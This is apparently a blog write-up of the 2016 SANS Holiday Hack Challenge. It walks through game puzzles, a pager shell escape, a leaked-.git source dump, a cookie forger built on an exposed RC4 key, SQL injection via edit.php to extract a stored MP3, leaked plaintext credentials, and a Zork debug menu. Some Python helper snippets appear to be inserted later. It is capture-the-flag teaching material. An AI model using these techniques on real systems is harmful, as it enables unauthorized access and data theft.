I spent a fair amount of time trying to map the labyrinth out, as the game offers to let you play the same cave again every time you die. I'm not sure if the original is like this or if it's a modified version, but room connections and dangers continued to shift after each death, which made mapping nearly impossible.

Peering at the strings revealed some interesting data.

Instructions? (y-n) wump.info Sorry, but the instruction file seems to have disappeared in a puff of greasy black smoke! (poof) PAGER /usr/bin/less open %s dup2 /bin/sh exec sh -c %s fork usage: wump [parameters]

Notice how when I originally started the game it said "the instruction file seems to have disappeared"? Creating a "wump.info" file in the same directory changed the output of the application. It's clear that the application is trying to call "less" on it.

elf@2f5ad872f71b:~$ echo "id" > wump.info
elf@2f5ad872f71b:~$ ./wumpus
Instructions? (y-n) y
sh: 1: /usr/bin/less: not found

You're in a cave with 20 rooms and 3 tunnels leading from each room.

I didn't find a way to hijack "less" and possibly get command-execution, but it turned out to be unnecessary. While researching the game, I stumbled upon this website which lets you play the original game online. For whatever reason, being able to visualize the game in boxes let me understand the core mechanic of the game and I was able to beat it within a few turns.

You are in room 19 of the cave, and have 5 arrows left. *whoosh* (I feel a draft from some pits). *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 6, 12, and 16. Move or shoot? (m-s) s 6 You are in room 19 of the cave, and have 4 arrows left. *whoosh* (I feel a draft from some pits). *sniff* (I can smell the evil Wumpus nearby!) There are tunnels to rooms 6, 12, and 16. Move or shoot? (m-s) s 12 *thwock!* *groan* *crash* A horrible roar fills the cave, and you realize, with a smile, that you have slain the evil Wumpus and won the game! You don't want to tarry for long, however, because not only is the Wumpus famous, but the stench of dead Wumpus is also quite well known, a stench plenty enough to slay the mightiest adventurer at a single whiff!! Passphrase: WUMPUS IS MISUNDERSTOOD

Basically, try to imagine a box of 9 squares with the Wumpus in the center. If you get the message that he's around, then move into another room - if you get the same message, then you know you're on the outside of the 9 and he's *potentially* in a room on either side of you. Let your arrows rain down death upon the Wumpus!

The password for terminal 3 is "WUMPUS IS MISUNDERSTOOD".

Terminal 4 - Santa's Office

Located directly past the Terminal 2 door. The password panel is hidden in the bookshelf.


I'll be honest and say that this one didn't immediately jump out at me. *turns in hacker-card* A quick Google of that phrase shows that it's a quote from the AI in WarGames...D'oh!

As soon as I knew it was WarGames I knew exactly what scene this was from. After some time on YouTube trying to find the full thing, I located this bad boy.

The terminal follows the dialogue of the movie verbatim.

GREETINGS PROFESSOR FALKEN. Hello. HOW ARE YOU FEELING TODAY? I'm fine. How are you? EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73? People sometimes make mistakes. YES THEY DO. SHALL WE PLAY A GAME? Love to. How about Global Thermonuclear War? WOULDN'T YOU PREFER A GOOD GAME OF CHESS? Later. Let's play Global Thermonuclear War. Fine.

Even to the point of only allowing you to play as the Ruskies...lame! :)

[ASCII-art map of the UNITED STATES and the SOVIET UNION]
WHICH SIDE DO YOU WANT?
1. UNITED STATES
2. SOVIET UNION
PLEASE CHOOSE ONE: 2

I always hated going to security cons in Vegas anyway!


The password for terminal 4 is "LOOK AT THE PRETTY LIGHTS".

Terminal 5 - Workshop - Train Station

Located at the train station in the Workshop.

Train Management Console: AUTHORIZED USERS ONLY

==== MAIN MENU ====

STATUS: Train Status
BRAKEON: Set Brakes
BRAKEOFF: Release Brakes
START: Start Train
HELP: Open the help document
QUIT: Exit console

menu:main>

This one is slightly different as it doesn't necessarily tell you what you need to do. Based on the menu, it seems pretty clear you need to start the train.

Starting with the "HELP" command I noticed something right off the bat. It's the same recipe I use for my cranberry pie!

Oh, and that it looks like LESS!

I attempted to break out of this by using the "!" command to pass through an external command for execution, specifically "!/bin/bash".

menu:main> HELP
sh-4.3$ id
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
sh-4.3$ ls
ActivateTrain TrainHelper.txt Train_Console
sh-4.3$ ls -lah
total 40K
drwxr-xr-x 2 conductor conductor 4.0K Dec 10 19:39 .
drwxr-xr-x 6 root root 4.0K Dec 10 19:39 ..
-rw-r--r-- 1 conductor conductor 220 Nov 12 2014 .bash_logout
-rw-r--r-- 1 conductor conductor 3.5K Nov 12 2014 .bashrc
-rw-r--r-- 1 conductor conductor 675 Nov 12 2014 .profile
-rwxr-xr-x 1 root root 11K Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root root 1.5K Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root root 1.6K Dec 10 19:36 Train_Console


Activating the program "ActivateTrain" starts the train and takes us back in time.

This warps us back to the year 1978, where most of the Elves are children, SD cards haven't been invented, and you can't escape "We Will Rock You" on the radio.

When you enter the DFER (Santa's Dungeon For Errant Reindeer) in 1978, the jolly man appears, answering the last part of this question.

Santa appears to have come down with amnesia and doesn't remember who kidnapped him - back to sleuthing!

Question 07 - Will Hack for MP3's

7) ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN AT THE NORTH POLE, ATTEMPT TO REMOTELY EXPLOIT EACH OF THE FOLLOWING TARGETS:

The Mobile Analytics Server (via credentialed login access)
The Dungeon Game
The Debug Server
The Banner Ad Server
The Uncaught Exception Handler Server
The Mobile Analytics Server (post authentication)

For each of those six items, which vulnerabilities did you discover and exploit?

REMEMBER, YOU ARE AUTHORIZED TO ATTACK ONLY THE IP ADDRESSES THAT TOM HESSMAN IN THE NORTH POLE EXPLICITLY ACKNOWLEDGES AS "IN SCOPE." ATTACK NO OTHER SYSTEMS ASSOCIATED WITH THE HOLIDAY HACK CHALLENGE.

Alright, we need to grab 6 MP3's spread across 5 servers. Going back to the APK, if we look in Bytecode Viewer at file "SantaGram_4.2/res/values/strings.xml", we can identify all of the URLs for the servers above.

Below is my compiled list of URLs and whether they are in-scope or not, along with a quick DNS lookup.

http://northpolewonderland.com - OUT OF SCOPE
$ host northpolewonderland.com
northpolewonderland.com has address

https://analytics.northpolewonderland.com/report.php?type=launch - IN SCOPE
https://analytics.northpolewonderland.com/report.php?type=usage - IN SCOPE
$ host analytics.northpolewonderland.com
analytics.northpolewonderland.com has address

http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5 - IN SCOPE
$ host ads.northpolewonderland.com
ads.northpolewonderland.com has address

http://dev.northpolewonderland.com/index.php - IN SCOPE
$ host dev.northpolewonderland.com
dev.northpolewonderland.com has address

http://dungeon.northpolewonderland.com - IN SCOPE
$ host dungeon.northpolewonderland.com
dungeon.northpolewonderland.com has address

http://ex.northpolewonderland.com/exception.php - IN SCOPE
$ host ex.northpolewonderland.com
ex.northpolewonderland.com has address

The Mobile Analytics Server

First things first, a quick Nmap scan to see what's open to us.

# nmap -sC analytics.northpolewonderland.com Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-14 10:46 EST Nmap scan report for analytics.northpolewonderland.com ( Host is up (0.025s latency). Other addresses for analytics.northpolewonderland.com (not scanned): rDNS record for Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA) | 2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA) |_ 256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA) 443/tcp open https | http-git: | | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Finishing touches (style, css, etc) | http-title: Sprusage Usage Reporter! |_Requested resource was login.php | ssl-cert: Subject: commonName=analytics.northpolewonderland.com | Not valid before: 2016-12-07T17:35:00 |_Not valid after: 2017-03-07T17:35:00 |_ssl-date: TLS randomness does not represent time | tls-nextprotoneg: |_ http/1.1 Nmap done: 1 IP address (1 host up) scanned in 19.21 seconds

Always brings a smile to my face when I find a Git repo!

A quick "wget" of the website pulls down all of the files within the "/.git/" directory and then we can use the below one-liner to decompress the object files in "/.git/objects" with openssl's zlib module and get access to the source code of the website.

$ for i in $(find ./ -type f); do openssl zlib -d < "$i" > "$i.out"; done
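The same step can be sketched in Python, since loose Git objects are plain zlib streams. This is a minimal sketch rather than the one-liner actually used: the function names `inflate_objects` and `find_in_objects` are made up for illustration, and it assumes the ".git/objects" directory has already been mirrored locally. Each decompressed blob starts with a short header such as "blob <size>" followed by a NUL byte, then the file contents.

```python
import zlib
from pathlib import Path


def inflate_objects(objects_dir):
    """Decompress every loose object under objects_dir into '<name>.out'.

    Hypothetical helper: returns the list of files it wrote.
    """
    written = []
    for path in sorted(Path(objects_dir).rglob("*")):
        if not path.is_file() or path.suffix == ".out":
            continue
        try:
            data = zlib.decompress(path.read_bytes())
        except zlib.error:
            # Anything that is not a zlib stream (indexes, HTML listings) is skipped.
            continue
        out = path.with_name(path.name + ".out")
        out.write_bytes(data)
        written.append(out)
    return written


def find_in_objects(objects_dir, needle):
    """Return the '.out' files whose contents include the byte string needle."""
    return [
        path
        for path in sorted(Path(objects_dir).rglob("*.out"))
        if needle in path.read_bytes()
    ]
```

Calling `find_in_objects(".git/objects", b"Please login to use the application")` after `inflate_objects(".git/objects")` plays the role of a recursive grep over the decompressed files.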

Looking at the strings of the "index.html" file reveals a number of directories and files, which gives us a good idea of the layout of the site.

README.md crypto.php css/bootstrap-theme.css css/bootstrap-theme.css.map css/bootstrap-theme.min.css css/bootstrap-theme.min.css.map css/bootstrap.css css/bootstrap.css.map css/bootstrap.min.css css/bootstrap.min.css.map css/bootstrap.min.css.orig db.php edit.php fonts/glyphicons-halflings-regular.eot fonts/glyphicons-halflings-regular.svg fonts/glyphicons-halflings-regular.ttf fonts/glyphicons-halflings-regular.woff fonts/glyphicons-halflings-regular.woff2 footer.php getaudio.php header.php index.php js/bootstrap.js js/bootstrap.min.js js/npm.js login.php logout.php mp3.php query.php report.php sprusage.sql test/Gemfile test/Gemfile.lock test/test_client.rb this_is_html.php this_is_json.php uuid.php view.php

Since we can only see the "login.php" page, I decide to start there and recursively grep the object files for a string on the page and then review the code.

$ grep -aR "Please login to use the application" * 25/92098ead7ae87e50b561a95a9e51e4195ef140.out: <p class="lead">Please login to use the application</p>

Reviewing the object file ".git/objects/25/92098ead7ae87e50b561a95a9e51e4195ef140.out" we find the below section of code.

} else {
    require_once('db.php');
    check_user($db, $_POST['username'], $_POST['password']);
    print "Successfully logged in!";
    $auth = encrypt(json_encode([
        'username' => $_POST['username'],
        'date' => date(DateTime::ISO8601),
    ]));
    setcookie('AUTH', bin2hex($auth));
    header('Location: index.php?msg=Successfully%20logged%20in!');
}
?>

It looks like a cookie is created by taking the JSON structure of username and date and passing it to the "encrypt" function.

Searching for the encryption function, I find it in ".git/objects/7a/b24db36e53d8aeb6943729e83b5f6f530a73f7.out".

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}

Now we have everything we need to generate our own authentication cookie; the only thing still missing is an account name.

In the object file ".git/objects/0a/d23f39b6572ebd114071c801e2140f7092e8a8.out" I find code that refers to the "guest" account.

// EXPERIMENTAL! Only allow guest to download.
if ($username === 'guest') {
    $result = query($db, "SELECT * FROM `audio` WHERE `id` = '" . mysqli_real_escape_string($db, $_GET['id']) . "' and `username` = '" . mysqli_real_escape_string($db, $username) . "'");

The below is a PHP script that will generate authentication cookies that we can apply to the "AUTH" value.

# cat gentoken.php
<?php
define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}

$auth = encrypt(json_encode(['username' => "guest", 'date' => date(DateTime::ISO8601),]));
echo bin2hex($auth);
?>

Our auth token for the "guest" account.

# php gentoken.php 82532b2136348aaa1fa7dd2243da1cc9fb13037c49259e5ed70768d4e9baa1c80b97fee8bfa42881f178bb70c49e0955b14648637bec
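For readers without PHP's mcrypt extension, here is a rough Python sketch of the same idea. MCRYPT_ARCFOUR in stream mode is plain RC4, so a textbook RC4 routine with the key from the repository should behave the same way; that equivalence and the exact JSON layout (no spaces, "username" before "date") are assumptions based on the PHP shown above, and the function names are invented for this example. Because RC4 is symmetric, the same routine also decodes an existing cookie.

```python
import json
from datetime import datetime, timezone

# Key copied from the define('KEY', ...) line recovered from the Git objects.
KEY = bytes.fromhex("6117a495bf3dd7cd2e0d8bcb9f79e1dc")


def rc4(key, data):
    """Textbook RC4; encrypting and decrypting are the same operation."""
    state = list(range(256))
    j = 0
    # Key-scheduling algorithm.
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    # Pseudo-random generation, XORed with the input.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(out)


def make_auth_cookie(username, when=None):
    """Build a hex AUTH value shaped like the one login.php sets (assumed layout)."""
    when = when or datetime.now(timezone.utc)
    payload = json.dumps(
        {"username": username, "date": when.strftime("%Y-%m-%dT%H:%M:%S%z")},
        separators=(",", ":"),
    )
    return rc4(KEY, payload.encode()).hex()


def read_auth_cookie(cookie_hex):
    """Decrypt a hex AUTH value back into its JSON fields."""
    return json.loads(rc4(KEY, bytes.fromhex(cookie_hex)))


if __name__ == "__main__":
    print(make_auth_cookie("guest"))
```

Swapping "guest" for another account name is all it takes to mint a cookie for that user, which is why the leaked key matters more than any password.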

Setting our cookie in Cookies Manager+ we successfully gain access to the "guest" account.

At the top of the page is a button labeled "MP3" which lets us download "discombobulatedaudio2.mp3".

Since we know there are two MP3 files on this server, we'll continue on.

Taking a look at the "index.php" page in object file ".git/objects/63/e494c4654066d2ee8f28135b1855dda23d88f7.out", we see that the MP3 button only appears if we're logged in as "guest", but we also learn there is an "administrator" account with an "Edit" button instead.

<?php if (get_username() == 'guest') { ?> <li><a href="/<?= mp3_web_path($db); ?>">MP3</a></li> <?php } if (get_username() == 'administrator') { ?> <li><a href="/edit.php">Edit</a></li> <?php

We find the code for the "mp3_web_path" function in object file ".git/objects/10/d46fe7c496411ff18f9177d6f99c25f2d0400a.out", and it shows that the ID of our user's audio record is passed as a parameter to the "getaudio.php" file.

function mp3_web_path($db) {
    $result = query($db, "SELECT `id` FROM `audio` WHERE `username` = '" . mysqli_real_escape_string($db, get_username()) . "'");
    if (!$result) {
        return null;
    }
    return 'getaudio.php?id=' . $result[0]['id'];
}

Let's go ahead and generate the "administrator" account cookie and see if we can get the user-ID to pass to the "getaudio.php" file.

# php test.php 82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d86e573b965cf9e6549b8494d6063a50565b71c76884152

After logging in as the "administrator" account I reviewed "getaudio.php" found in object file ".git/objects/0a/d23f39b6572ebd114071c801e2140f7092e8a8.out". Unfortunately, my hopes of just passing an ID were quickly dashed with the below code.

// EXPERIMENTAL! Only allow guest to download.
if ($username === 'guest') {
    $result = query($db, "SELECT * FROM `audio` WHERE `id` = '" . mysqli_real_escape_string($db, $_GET['id']) . "' and `username` = '" . mysqli_real_escape_string($db, $username) . "'");

The ID is gathered by unpacking the "AUTH" cookie and getting the username and then looking it up within the database. All hopes of SQLi through these functions get crushed by parameterized values and the mysqli_real_escape_string function.

I found that I was able to inject reports into the database through the "report.php" page that was found in the APK resources, but ultimately could not get it to render any PHP due to the mysqli_real_escape_string and htmlentities functions. Along with this, since there were so many object files, I quite frequently found older versions of pages which contained vulnerabilities that weren't actually exploitable in the currently deployed iteration, so I chased a lot of red herrings.

Taking a step back, the "administrator" account is given access to a new page, so it makes sense to think that page will be crucial in completing this attack. The "Edit" page lets you edit saved queries from the "Query Engine". The queries allow you to look up reported information, presumably from the SantaGram application.

Reviewing the code in object file ".git/objects/b7/5048eda4700268b38de8aff1dfec5a8f023ab5.out" shows how the queries are built for the "reports" table; specifically, there are "id", "name", "description", and "query" values.

$query = "SELECT * ";
$query .= "FROM `app_" . $type . "_reports` ";
$query .= "WHERE " . join(' AND ', $where) . " ";
$query .= "LIMIT 0, 100";

if(isset($_REQUEST['save'])) {
    $id = gen_uuid();
    $name = "report-$id";
    $description = "Report generated @ " . date('Y-m-d H:i:s');
    $result = mysqli_query($db, "INSERT INTO `reports` (`id`, `name`, `description`, `query`) VALUES ('$id', '$name', '$description', '" . mysqli_real_escape_string($db, $query) . "') ");

When I reviewed "edit.php" in the object file ".git/objects/c0/8beb21bd744a41d784eb9b1e9e90d2b3a884cc.out", I noticed it checks whether the "id" value is passed as a parameter with "$_GET['id']". If that parameter exists, it checks the rest of the parameters in the URI and subsequently updates each field in the database with the provided value; if it doesn't, it uses the values passed through the webpage.

$result = mysqli_query($db, "SELECT * FROM `reports` WHERE `id`='" . mysqli_real_escape_string($db, $_GET['id']) . "' LIMIT 0, 1");
if(!$result) {
    reply(500, "MySQL Error: " . mysqli_error($db));
    die();
}
$row = mysqli_fetch_assoc($result);

# Update the row with the new values
$set = [];
foreach($row as $name => $value) {
    print "Checking for " . htmlentities($name) . "...<br>";
    if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'";
    }
}

Notice what's missing?

The "query" value isn't available via the website but should be available via the URI! A quick sanity check of "view.php" to make sure it doesn't filter out the query in any way.

<?php format_sql(query($db, $row['query'])); }

Now we're onto something if we can craft a SQL query that lets us dump the MP3 file from the database.

In the object file ".git/objects/49/76b1415ee55aa3a757db375d0f24a826e1c85f.out" we find a SQL dump and see how our "audio" table is constructed.

CREATE TABLE `audio` (
  `id` varchar(36) NOT NULL,
  `username` varchar(32) NOT NULL,
  `filename` varchar(32) NOT NULL,
  `mp3` MEDIUMBLOB NOT NULL,
  PRIMARY KEY (`id`)
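To make the "edit.php" behaviour concrete, here is a small sketch of how such a request could be assembled. It is illustrative only: the report ID is a placeholder for a UUID of a report you saved yourself, the example query is just one plausible choice built from the schema above, and `build_edit_url` is a made-up helper name. The only things taken from the source are the host, the "edit.php" page, and the fact that any column name present in the URI (including "query") gets written to the row.

```python
from urllib.parse import urlencode

# Host and page name come from the write-up; everything else is illustrative.
BASE_URL = "https://analytics.northpolewonderland.com/edit.php"


def build_edit_url(report_id, new_query):
    """Return an edit.php URL that overwrites the saved report's `query` column."""
    params = {"id": report_id, "query": new_query}
    return BASE_URL + "?" + urlencode(params)


if __name__ == "__main__":
    # Placeholder ID: substitute the UUID of a report saved from the query page.
    placeholder_id = "00000000-0000-0000-0000-000000000000"
    print(build_edit_url(placeholder_id, "SELECT `username`, `filename` FROM `audio`"))
```

Letting `urlencode` do the escaping avoids hand-encoding backticks, spaces, and commas in the SQL.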

A quick validation by submitting the below URL...


Then browsing to it via "view.php"...

Now that we validated injection, it's time to dump that MP3!

As "MEDIUMBLOB" is a byte string, I opted to convert it to hex and extract it that way via the website.


The result.

A quick copy and paste again into the 010 Editor and we now have "discombobulatedaudio7.mp3".
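If you'd rather not paste into a hex editor, the conversion is a few lines of Python. This is a sketch under the assumption that the hex text copied from the page has been saved to a local file; the helper names and the file names in the usage comment are hypothetical.

```python
import re


def hex_to_bytes(hex_text):
    """Convert a hex dump (whitespace and line breaks allowed) to raw bytes."""
    cleaned = re.sub(r"\s+", "", hex_text)
    return bytes.fromhex(cleaned)


def save_hex_as_file(hex_text, out_path):
    """Write the decoded bytes to out_path and return how many bytes were written."""
    data = hex_to_bytes(hex_text)
    with open(out_path, "wb") as handle:
        handle.write(data)
    return len(data)


# Example usage (file names are placeholders):
#   with open("dump.hex") as src:
#       save_hex_as_file(src.read(), "discombobulatedaudio7.mp3")
```

`bytes.fromhex` raises `ValueError` on stray non-hex characters, which is a handy signal that some HTML came along with the copy and paste.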

*NOTE* The below was also found in the database file. The "administrator" credentials are valid but the "guest" one does not work. It was a moot point due to the cookie generator I wrote.

INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');

The Dungeon Game

Nmap reveals a socket listening on TCP/11111 and a webserver which has instructions for a game called "Dungeon".

Starting Nmap 7.12 ( https://nmap.org ) at 2016-12-14 10:46 EST Nmap scan report for dungeon.northpolewonderland.com ( Host is up (0.94s latency). Other addresses for dungeon.northpolewonderland.com (not scanned): rDNS record for Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 4e:cd:15:a7:44:ed:87:d5:41:81:c2:0e:78:db:c0:d0 (DSA) | 2048 5b:14:72:d1:17:a2:3f:98:fb:fe:6c:7d:29:49:19:a2 (RSA) |_ 256 6a:8d:56:49:a3:f5:8c:fd:14:42:a7:c0:4e:ef:a8:64 (ECDSA) 80/tcp open http |_http-title: About Dungeon 11111/tcp open vce Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds

If you're not familiar with this game, it's a variant of Zork which is another old-school text-based adventure game. You enter commands and navigate the game world to collect treasure. I hate Zork. I hated it in the 80's, I hated it in the 90's, and I've continued to hate it for each decade since. I'd almost forgotten how much I disliked this game until I had to play it again here.

$ nc dungeon.northpolewonderland.com 11111 Welcome to Dungeon. This version created 11-MAR-78. You are in an open field west of a big white house with a boarded front door. There is a small wrapped mailbox here. >open mailbox Opening the mailbox reveals: A leaflet. >read leaflet Taken. Welcome to Holiay Hack Challenge Dungeon! Dungeon is a game of adventure, danger, and low cunning. In it you will explore some of the most amazing territory ever seen by mortal man. Hardened adventurers have run screaming from the terrors contained within. In Dungeon, the intrepid explorer delves into the forgotten secrets of a lost labyrinth deep in the bowels of the earth, searching for vast treasures long hidden from prying eyes, treasures guarded by fearsome monsters and diabolical traps! Your mission is to find the elf at the North Pole and barter with him for information about holiday artifacts you need to complete your quest. While the original mission objective of collecting twenty treassures to place in the trophy case is still in play, it is not necessary to finish your quest. No DECsystem should be without one! Dungeon was created at the Programming Technology Division of the MIT Laboratory for Computer Science by Tim Anderson, Marc Blank, Bruce Daniels, and Dave Lebling. It was inspired by the Adventure game of Crowther and Woods, and the Dungeons and Dragons game of Gygax and Arneson. The original version was written in MDL (alias MUDDLE). The current version was translated from MDL into FORTRAN IV by a somewhat paranoid DEC engineer who prefers to remain anonymous, and was later translated to C. On-line information may be obtained with the commands HELP and INFO.

We're also given quite a few hints from our friendly Elves.

<Alabaster Snowball> - Hi, I'm Alabaster Snowball. I'm a bug bounty hunter! <Alabaster Snowball> - Did Pepper send you? She's obsessed with Dungeon! <Alabaster Snowball> - I don't know if Dungeon can be won. I do believe there is a way to cheat though...


<Pepper Minstix> - When I need a break from bug bounty work, I play Dungeon. I've been playing it since 1978. I still have yet to beat the Cyclops... <Pepper Minstix> - Alabaster's brother is the only elf I've ever seen beat it, and he really immersed himself in the game. I have an old version here.

I decided to try and play the game, which directly correlates to my hate of the game. Many hours went into using the maps found here to try and navigate the game.

Since the Elf hinted at beating the Cyclops, I hoped that I would find the new Elf NPC in that area...I was wrong. But I still grabbed the egg, killed a troll, and made it all the way past the Cyclops to fight the Thief! I was actually pretty pleased with that but I kept getting killed by the Thief, presumably because I didn't have a high enough score yet.

open mailbox read drop n n u get egg open egg d s s e s w s n e open window enter take sack w take sword take lantern move rug open trap door down turn on lantern e attack troll s e e s w u take coins take keys sw e s ne Ulysses u give egg d n e e u take knife d w w s u kill thief

I decided to take a look at the binary and approach this problem differently since I didn't seem to make headway playing legit.

# file dungeon dungeon: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=98dcce48be68f3ec423311876266acb5e097a01b, not stripped

So we have a 64-bit ELF binary (elf...heh) that hasn't been stripped. Checking out the strings revealed some interesting entries as well. Below is a snippet containing the juicy parts.

DRDODADCDXDHDLDVDFDSAFHENRNTNCNDRRRTRCRDTKEXARAOAAACAXAVD2DNANDMDTAHDPPDDZAZHH You are not an authorized user. GDT> Idx,Ary: %d %d Limits: Entry: RM# DESC1 DESC2 EXITS ACTION VALUE FLAGS %6d OB# DESC1 DESC2 DESCO ACT FLAGS1 FLAGS2 FVL TVL SIZE CAPAC ROOM ADV CON READ %3d%6d%6d%6d%4d%7d%7d%4d%4d%6d%6d %4d%4d%4d%6d AD# ROOM SCORE VEHIC OBJECT ACTION STREN FLAGS CL# TICK ACTION FLAG %3d %6d %6d %c RANGE CONTENTS %3d-%3d THFPOS= %d, THFFLG= %c, THFACT= %c SWDACT= %c, SWDSTA= %d R=%d, X=%d, O=%d, C=%d V=%d, A=%d, M=%d, R2=%d MBASE=%d, STRBIT=%d VL# OBJECT PROB OPPS BEST MELEE Flag #%-2d = %c Parse vector= %6d %6d %6d %c %6d Play vector= %6d %6d %c State vector= %6d %6d %6d %6d %6d %6d %6d %6d %6d %6d %6d Scol vector= %6d %6d %6d Old= %c New= Valid commands are: AA- Alter ADVS DR- Display ROOMS AC- Alter CEVENT DS- Display state AF- Alter FINDEX DT- Display text AH- Alter HERE DV- Display VILLS AN- Alter switches DX- Display EXITS AO- Alter OBJCTS DZ- Display PUZZLE AR- Alter ROOMS D2- Display ROOM2 AV- Alter VILLS EX- Exit AX- Alter EXITS HE- Type this message AZ- Alter PUZZLE NC- No cyclops DA- Display ADVS ND- No deaths DC- Display CEVENT NR- No robber DF- Display FINDEX NT- No troll DH- Display HACKS PD- Program detail DL- Display lengths RC- Restore cyclops DM- Display RTEXT RD- Restore deaths DN- Display switches RR- Restore robber DO- Display OBJCTS RT- Restore troll DP- Display parser TK- Take No robber. No troll. No cyclops. No deaths. Restored robber. Restored troll. Restored cyclops. Restored deaths. Taken. Old = %6d New = Old= %6d New= Old = %6d New= #%2d Room=%6d Obj=%6d

No deaths? Sign me up!

Googling a few of those strings led me to this Github page for the file "zork/gdt.c".


Typing "gdt" in the game gives us access to the menu I found in the binary strings output.

The "nd" command flips on god-mode and I finally put the Thief to rest! But...I still couldn't find the Elf anywhere around that area. Argh!

After a breather and some Zork research online, I found just one website which mentioned this incantation you can cast within the game to automatically warp to the endgame! Surely, the Elf will be at the endgame!

incant, DNZHUO IDEQTQ d n break beam s push button n n enter lift short pole push red wall push red wall push short pole push mahogany wall push mahogany wall push mahogany wall push mahogany wall lift short pole push red wall push red wall push red wall push red wall push pine wall n

Pro-tip: He's not. SANTA ZORK! Since I had god-mode enabled, I also got stuck in this location since you're not supposed to actually be able to survive the attack by the Guardians once you step through the Pine Wall into the open field...

Going back to the drawing board, I decided to take another look at the GDT menu and noticed this gem, "TK", or "Take", and had the bright idea that maybe I could just take all of the 20 treasures I needed and beat the game "legitimately", since so much seems to be based on your score (it kept telling me my score rank was "Hacker").

Playing around with the command, it effectively just takes a number as an argument and puts the corresponding object into your inventory. There didn't appear to be any rhyme or reason as to the layout of objects in the array and it even held non-inventory items, such as glaciers, a large tree, and a cliff.

I determined I'd need to enumerate all of the objects to find the indexes of the treasure and wrote a quick script to take a set of objects and then check my inventory. Below is an example of the first few objects, along with my notation for object number of the treasures needed to win the game.
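The enumeration can be sketched roughly like this. It is not the original script, just a minimal reconstruction of the idea: the command order ("gdt", then "tk" followed by an object number, then "ex" to leave the debugger and "i" to list inventory) follows the sessions shown in this write-up, while the function name and the batch size are made up.

```python
def build_take_commands(first, last):
    """Return the lines to send for taking objects first..last and then listing them."""
    commands = ["gdt"]          # enter the game debugging tool
    for index in range(first, last + 1):
        commands += ["tk", str(index)]   # "tk" prompts with "Entry:" for the number
    commands += ["ex", "i"]     # leave GDT, then print the inventory
    return commands


if __name__ == "__main__":
    # Print a batch that can be piped into the game, for example:
    #   python takeall.py | nc dungeon.northpolewonderland.com 11111
    print("\n".join(build_take_commands(1, 28)))
```

Working in small batches keeps the inventory listing short enough to line each entry up with its index by hand.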

A brown sack. A clove of garlic. A lunch. A piece of vitreous slag. A small pile of coal. 06* A jade figurine. A machine. 08* A huge diamond. A trophy case. A glass bottle. A quantity of water. A rope. A knife. A sword. A lamp. A broken lamp. A carpet. A pile of leaves. A troll. A bloody axe. A rusty knife. A burned-out lantern. A set of skeleton keys. A skeleton. 25* A bag of coins. 26* A platinum bar. A pearl necklace. A mirror.

Around object 200 something magical happened...

>GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: Taken. GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ? GDT>Entry: ?

We hit the end...let's see what the last few items are so we can grab our treasure.

GDT>ex >i You are carrying: A pair of hands. A breath. A flyer. A bird. A tree. A northern wall. A southern wall. A eastern wall. A western wall. A water. A Guardian of Zork. A compass rose. A mirror. A panel. A stone channel. A dungeon master. A ladder. A Elf.

An Elf!

Since I know I need to give the Elf some treasure, I give him the only thing in my inventory that might be treasure-ish, a bird that I dubbed "Puffington" to align with the spirit of the North Pole theme.

>look at elf The elf appears increasingly impatient. You are behind the white house. In one corner of the house there is a window which is open. >give elf bird "That wasn't quite what I had in mind", he says, tossing the bird into the fire, where it vanishes.


A quick visit to my treasure/index list and I grab a treasure I know he'll like.

